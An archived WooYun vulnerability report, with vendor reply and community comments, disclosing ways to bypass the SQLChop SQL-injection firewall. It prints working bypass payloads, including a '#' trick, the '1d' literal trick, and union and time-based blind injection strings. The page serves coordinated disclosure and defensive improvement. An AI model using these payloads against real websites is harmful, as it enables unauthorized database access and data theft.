当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0126555

漏洞标题:长亭科技sqlchop bypass

相关厂商:chaitin.com

漏洞作者: izy

提交时间:2015-07-14 12:17

修复时间:2015-07-14 12:53

公开时间:2015-07-14 12:53

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-14: 细节已通知厂商并且等待厂商处理中
2015-07-14: 厂商已经确认,细节仅向厂商公开
2015-07-14: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

T_T

详细说明:

First:
对#的处理问题:
因为#是注释符,在语法分析中对此符号没有做好处理导致可被绕过。
例如提交即可绕过:
test%23aaa' union select user(),2;

屏幕快照 2015-07-13 下午8.53.25.png


只要我们在字符串中包含#这个字符就可以导致waf失效!这是非常严重的。。。
Second:
直接select{x user}from{x admin}这样是不行的
但是fuzz了一下:
这样可以绕过:select{x user}from{1d admin}
union:
union select (select{x user}from{1d admin}+limit+1),1
盲注:
1' and if(ascii(substr((select{1d user()}),1,1))>11,sleep(1),1)
同理报错注入也是可以的!
关键点在1d这个地方!同样一点错误导致waf完全被绕过!
注入的判断:
and--!!!1=- -!!!1
and--!!!1=- -!!!0
or:
%26%261=1
%26%261=0
||1=1
还有些数据库特性:
1):iis在asp程序处理中对于%的处理
2):iis在aspx程序处理中对于%u00的处理
3):select 1,2,3,4 from dual where id =1[]union[]select[]1,2,3,4 from[]

屏幕快照 2015-07-13 下午7.39.38.png


一些小问题,感觉这样防御有点暴力:

屏幕快照 2015-07-13 下午8.33.59.png


屏幕快照 2015-07-13 下午8.47.32.png

漏洞证明:

屏幕快照 2015-07-13 下午7.39.48.png


屏幕快照 2015-07-13 下午7.40.10.png


屏幕快照 2015-07-13 下午8.22.07.png

修复方案:

语法分析思路很赞啊!

版权声明:转载请注明来源 izy@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-07-14 12:48

厂商回复:

非常感谢乌云的报告。在收到报告后我们技术人员进行了分析,如下:
使用语句test%23aaa' union select user(),2; 进行测试的时候显示Blocked。为了严谨,仔细核查日志,发现日志中语句test%23aaa' union select user(),2; 的所有测试也都是被拦截的。不知道是不是白帽子在测试的时候是不是因为网络导致显示的还是前一条的结果。为了避免再次让测试者误解,前端方面我们也会再努力去进行调整。
关于1d的问题,词法分析实现时考虑了oracle db下对浮点数的处理,将1d处理为数字,于是我们在后端对1d进行了特殊处理以至于出现这种bug。除白帽子报告的1d以外,还有1f也有这个问题。在下一版本中我们会进行一些完善。
由于考虑到union注入可能导致非常严重的后果,于是之前的实现中对这部分做了严格的处理。关于uddddnion dd误报的问题在下一版本中会综合实际情况考虑进行一些调整。
再次感谢白帽子报告问题。

最新状态:

2015-07-14:现在公开供大家学习,下一版本中统一修复。


漏洞评价:

评论

  1. 2015-07-14 10:15 | erevus ( 普通白帽子 | Rank:177 漏洞数:31 | Hacked by @ringzero 我錯了)

    前排挤挤围观怎么绕~

  2. 2015-07-14 10:18 | flsf ( 路人 | Rank:4 漏洞数:2 | 没事儿,小钱儿)

    围观

  3. 2015-07-14 11:06 | 玉林嘎 ( 普通白帽子 | Rank:758 漏洞数:96 )

    围观!!!!

  4. 2015-07-14 11:07 | 小博博 ( 实习白帽子 | Rank:60 漏洞数:9 | .)

    打脸啊

  5. 2015-07-14 11:08 | 小胖子 认证白帽子 ( 核心白帽子 | Rank:1727 漏洞数:140 | 如果大海能够带走我的矮丑...)

    说好了永别了SQL注入呢?攻陷长亭,活捉肉肉!!!!

  6. 2015-07-14 11:08 | 淡漠天空 认证白帽子 ( 实习白帽子 | Rank:1113 漏洞数:142 | M:出售GOV STATE NSA CIA NASA DHS Symant...)

    庆幸不是阿里峰会的时候被人发出来吧那就呵呵哒了

  7. 2015-07-14 11:09 | yunxu ( 路人 | Rank:26 漏洞数:5 | 呵呵哒)

    打脸了!

  8. 2015-07-14 11:09 | 孤独雪狼 ( 普通白帽子 | Rank:710 漏洞数:145 | 七夕手机被偷,这坑爹的七夕啊 。。。。)

    肉肉V表示不服

  9. 2015-07-14 11:10 | JiuShao ( 普通白帽子 | Rank:405 漏洞数:94 | ╮(╯▽╰)╭锄禾日当午)

    说好了永别了SQL注入呢?攻陷长亭,活捉肉肉!!!!

  10. 2015-07-14 11:10 | mtfly ( 路人 | Rank:26 漏洞数:6 | 啥都不会)

    赶紧公布了吧。

  11. 2015-07-14 11:17 | prolog ( 普通白帽子 | Rank:544 漏洞数:107 | 低调求发展)

    说好了永别了呢……

  12. 2015-07-14 11:20 | Jumbo ( 普通白帽子 | Rank:111 漏洞数:29 | 猫 - http://www.chinabaiker.com)

    活该,真能装逼

  13. 2015-07-14 11:22 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    永别...

  14. 2015-07-14 11:25 | answer ( 普通白帽子 | Rank:347 漏洞数:45 | 答案)

    啪啪

  15. 2015-07-14 11:28 | iceks ( 路人 | Rank:4 漏洞数:1 | 你是我的小呀小苹果~)

    这个逼装的可以

  16. 2015-07-14 11:42 | 牛肉包子 ( 普通白帽子 | Rank:254 漏洞数:64 )

    攻破长亭 活捉肉肉

  17. 2015-07-14 11:43 | 浩天 认证白帽子 ( 普通白帽子 | Rank:915 漏洞数:79 | 度假中...)

    不要乱喷吖,兄弟们

  18. 2015-07-14 11:54 | izy ( 普通白帽子 | Rank:111 漏洞数:22 | http://1zy.pw/)

    @浩天 我错了.... 没想到。。。。完了。。。T_T

  19. 2015-07-14 12:01 | her0ma ( 核心白帽子 | Rank:598 漏洞数:84 | 专注小厂商三十年!)

    希望不是标题党…… 坐等公开!

  20. 2015-07-14 12:54 | 北京长亭科技有限公司(乌云厂商)

    关于永别了这个问题,欢迎大家先看PPT啊。看完后大家觉得有什么问题,非常欢迎来交流哦。

  21. 2015-07-14 13:10 | luwikes ( 普通白帽子 | Rank:512 漏洞数:77 | 潜心学习~~~)

    唉,好疼!!!

  22. 2015-07-14 13:15 | her0ma ( 核心白帽子 | Rank:598 漏洞数:84 | 专注小厂商三十年!)

    wooyun最佳厂商回复,学习了!如楼上说的小伙伴们去找阿里演讲的PPT或者视频看看,在演讲中死猫大人对"永别了"这个说法有说明的,好像不是字面理解的那样……

  23. 2015-07-14 13:40 | MayIKissYou ( 普通白帽子 | Rank:195 漏洞数:33 | 勿忘初心)

    1d这个有点6 = = 厉害啊

  24. 2015-07-14 14:05 | BraveRT ( 路人 | Rank:4 漏洞数:1 | 好!)

    永别SQL注入表示不服

  25. 2015-07-14 15:14 | Dark4ce ( 路人 | Rank:23 漏洞数:4 )

    永远有比你牛的人,话不要说的太满,脸被打的啪啪的例子那么多,就不懂得低调些!

  26. 2015-07-14 15:42 | qdq ( 路人 | Rank:2 漏洞数:1 | 有关部门)

    @all 大家别上当,长亭其实是来偷payload的

  27. 2015-07-14 18:36 | 一个狗 ( 实习白帽子 | Rank:42 漏洞数:3 | ADoG)

    关于“永别了”这个说法,我当时在阿里安全峰会有讲,意思是说只有大家都来努力提升防护技术水平,才可能把 SQ 注入防护提升到很高的水平,让 SQL 注入这种攻击的门槛和成本变得相当高,这样的话,才能在一定程度上和 SQL 注入说再见。“永别了”是一个美好的愿景,并不是说我们的 SQLChop 现在就已经完美无缺,SQLChop 也需要大家的帮助来慢慢改进。可重点是我们的确通过自己的努力,用新的思路把 SQL 注入的系统性防护水平提到了一个更高的水平,我们希望倡导的是大家努力来推进防护水平的技术进步,不然大家整天就是改来改去一些正则表达式(而且正则防护系统在理论上就是有先天缺陷的),有什么意思呢?

  28. 2015-07-15 10:36 | G9sT的测试 ( 路人 | Rank:0 漏洞数:1 | 我不是roots01)

    话说求教sqlchop怎么用的?

  29. 2015-07-15 15:05 | zhighest ( 路人 | Rank:2 漏洞数:2 | ....)

    还是360网站宝靠谱啊,一个select关键字就拦截了...

  30. 2015-07-16 18:07 | xy小雨 ( 普通白帽子 | Rank:171 漏洞数:50 | 成为海贼王的男人)

    啪啪啪打脸了,好痛

  31. 2015-07-24 23:17 | kris ( 路人 | Rank:22 漏洞数:3 | 我很单纯但很热情。)

    楼上好幽默(*^__^*)

  32. 2015-08-07 11:28 | mantis ( 路人 | Rank:21 漏洞数:5 | 一萧一剑走江湖,千古情愁尿一壶)

    厂商这回复真尼玛机智,以后所有厂商都可以参照